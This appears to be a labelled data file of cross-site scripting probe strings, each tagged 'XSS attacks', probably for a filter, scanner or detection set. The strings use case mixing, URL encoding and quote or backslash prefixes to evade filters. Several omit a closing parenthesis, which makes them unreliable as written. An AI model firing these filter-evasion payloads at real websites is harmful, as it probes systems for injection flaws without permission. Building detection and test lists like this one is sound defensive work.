=\\><<ScRiPt>AlErT('XSS')</ScRiPt> : XSS attacks
=\><<script>alert('XSS')</script> : XSS attacks
=\><<ScRiPt>AlErT('XSS')</ScRiPt> : XSS attacks
"%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS attacks
"%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS attacks
=%3e%3c%3e%3cscript>alert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS attacks
=%3e%3c%3e%3cScRiPt>AlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS attacks
="%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS attacks
="%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS attacks
='%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS attacks
='%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS attacks
="%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS attacks
="%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS attacks
='%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS attacks
='%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS attacks
\\><script>alert(String.fromCharCode(88, 83, 83)</script> : XSS attacks
\\><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS attacks
=><><script>alert(String.fromCharCode(88, 83, 83)</script> : XSS attacks
=><><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS attacks
=\\><script>alert(String.fromCharCode(88, 83, 83)</script> : XSS attacks
=\\><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS attacks
=\><script>alert(String.fromCharCode(88, 83, 83)</script> : XSS attacks
=\><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS attacks
=\\><<script>alert(String.fromCharCode(88, 83, 83)</script> : XSS attacks
=\\><<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS attacks
=\><<script>alert(String.fromCharCode(88, 83, 83)</script> : XSS attacks
=\><<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS attacks
%5c%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e : XSS attacks
%5c%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e : XSS attacks
=%3e%3c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e : XSS attacks
=%3e%3c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e : XSS attacks
=%5c%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e : XSS attacks
=%5c%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e : XSS attacks
=%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e : XSS attacks
=%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e : XSS attacks
=%5c%5c%3e%3c%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e : XSS attacks
=%5c%5c%3e%3c%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e : XSS attacks
=%5c%3e%3c%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e : XSS attacks
=%5c%3e%3c%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e : XSS attacks
%5c%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS attacks
%5c%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS attacks
=%3e%3c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS attacks
=%3e%3c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS attacks
=%5c%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS attacks
=%5c%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS attacks
=%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS attacks
=%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS attacks
=%5c%5c%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS attacks
=%5c%5c%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS attacks
=%5c%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS attacks
=%5c%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS attacks
